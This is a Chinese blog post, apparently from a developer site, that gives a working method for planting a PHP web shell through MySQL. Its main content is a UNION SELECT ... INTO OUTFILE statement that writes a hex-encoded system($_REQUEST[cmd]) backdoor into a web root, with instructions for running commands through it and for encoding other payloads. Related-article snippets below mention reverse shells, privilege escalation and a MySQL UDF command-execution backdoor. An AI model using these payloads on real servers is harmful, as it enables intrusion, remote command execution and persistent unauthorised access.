mysql 数据库留后门,运用Mysql语句生成后门木马的具体方法

最新推荐文章于 2023-12-09 11:06:32 发布
最新推荐文章于 2023-12-09 11:06:32 发布
阅读量771 收藏
点赞数
文章标签: mysql 数据库留后门

c4468b3f4df77e96b0a416fa2a870fba.png

通过Mysql 的语句生成后门木马的方法:

SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455

3545B636D645D293B3F3E

from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文档,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就能够执行系统DOS命令!

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

答:就是下面代码中的十六进制编码,

假如不用这种方法,有不同的SQL版本会出现其他的编码:如%xx之类的,哪这个后门就不能执行了!假如您有其他语名要弄,能够到UltraEdit里输入,再按[Ctrl H]键,将里面的十六进制连在一起就能够了!

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com

特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

郭祥昊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,后门
7Riven's blog
01-29 905
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
mysql 隐秘后门_【技术分享】CVE-2016-5483:利用mysqldump备份可生成后门
weixin_35713824的博客
02-07 208
预估稿费:100RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言mysqldump是用来创建MySQL数据库逻辑备份的一个常用工具。它在默认配置下可以生成一个.sql文件,其中包含创建/删除表和插入数据等。在导入转储文件的时候,攻击者可以通过制造恶意表名来实现任意SQL语句查询和shell命令执行的目的。另一个与之相关的漏洞利用场景可以参考。攻击场景攻击者已经能够访问...
通过mysql能植入木马_通过Mysql语句生成后门木马的方法
weixin_33509600的博客
01-19 123
通过Mysql语句生成后门木马的方法!SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过M...
数据库后门是什么?我们要如何预防它的危害
最新发布
dexunjiaqiang的博客
12-09 163
数据库后门是黑客在数据库中安装的一种特殊程序或代码,可以绕过正常的认证和授权机制,从而获取数据库的敏感信息或者控制整个数据库。黑客可以通过各种方式安装后门,比如利用漏洞、钓鱼、社会工程学等。
php简单后门实现及php连接数据库
qq_58683895的博客
10-24 824
包含php简单后门的实现代码及操作,以及php连接数据库的操作代码及介绍,和相关php函数的介绍
MySQL数据库数据库的创建SQL语句.pptx
05-30
数据库和表的创建和管理;; ...或者 mysql -u数据库用户名 -p ...所以一般情况下输入 ...或者 mysql -uroot -p ...create database [if not exists] 数据库名 ...MySQL命令行登录和显示数据库 MySQL数据库的创建(语句模式);谢谢
MySQl数据库必知必会sql语句(加强版)
09-09
本文给大家分享了一篇关于mysql数据库必会sql语句加强版内容,非常不错,具有参考借鉴价值,需要的朋友参考下吧
MySQL数据库中使用C执行SQL语句的方法
12-15
然后,他们将编写从数据库检索数据的简单程序执行SQL语句 现在,我们已经有了一个连接,并且知道如何处理错误,是时候讨论使用我们的数据库来作一些实际工作了。执行所有类型的SQL的主关键字是mysql_query: int ...
MySQL数据库使用,MySQL的安装和使用及MySQL语句介绍,MySQLmysql数据库安装及运用
01-09
安装mysql可视化安装包,流程在MYSQL的PDF文件里,也可用mysql57文件夹里的已下载好的安装包进行安装),mysql的各类使用语句以及作用介绍,适合mysql初学者以及it专业大学生学习以及参考运用,请勿用于商业用途。...
MySQL数据库生成数据字典xls-java.zip
04-27
通过java jdbc 链接MySQL数据库生成数据字典下载到xlsx 单main方法执行 String dbName = "activationservice"; String URL = "jdbc:mysql://127.0.0.1:3306/" + dbName + "?characterEncoding=utf-8&serverTime...
nfine去后门版和数据库说明
04-30
nfine去后门版和数据库说明,节约程序员时间,去除60%业务代码编写
mysql 提权_Mysql提权后门
weixin_33532301的博客
01-18 178
记录一次关于无聊时对基友MYSQL服务器的提权攻击。尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。...
数据库入侵方法
Aspstudy与你一起学习ASP ......
03-08 6958
一般的web server都要使用数据库来存储信息,几乎所有的网站都要用数据库。这样就存在着两种可能,一种是使用小型数据库,如aceess,一般就储存在本地。另一种是使用大型数据库,如SQL server,Oracle这时候一般就放在另一台机器上,然后通过ODBC来访问它。 由于页面经常需要查询各种信息,修改用户信息等操作,实质上就是和数据库打交道了。这样就给非法用户下利用的机会了。 1.对本地
Linux服务器各种后门查杀
有勇气的牛排博客
03-22 7242
hack再攻击我方服务器的时候,一般都会选择使用kali中的各种扫描工具,或其他自动脚本,对所有路由扫描排查,尤其是 /admin之类的敏感路由,当然大规模扫描也容易在日志中分析出来,访问量统计会非常明显,个人在接触网络安全后,发现很多脚本喜欢扫描php后台项目部署后,如果不是因为基础错误而崩溃的话,往往是被人大规模扫描了。
mysql数据库后门_Mysql5 数据库后门代码!(经测试,灰常好用)
weixin_35664484的博客
01-19 234
DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;DROP FUNCTION IF EXISTS sys_get;DROP FUNCTION IF EXISTS sys_set;DROP FUNCTION IF EXISTS sys_exec;DROP FUNCTION IF EXISTS sys_eval;CREATE FUNCTION lib_mysq...
Mysql5 数据库后门代码!(经测试,灰常好用)
weixin_34259232的博客
04-23 150
DROP FUNCTION IF EXISTS lib_mysqludf_sys_info; DROP FUNCTION IF EXISTS sys_get; DROP FUNCTION IF EXISTS...
mysql数据库执行语句_mysql中记录SQL执行语句的方法
06-01
具体方法为: 1. 修改MySQL配置文件my.cnf,在[mysqld]下添加如下行: ``` general_log=ON general_log_file=/var/log/mysql/mysql.log ``` 其中,general_log表示开启general log,general_log_file表示general ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值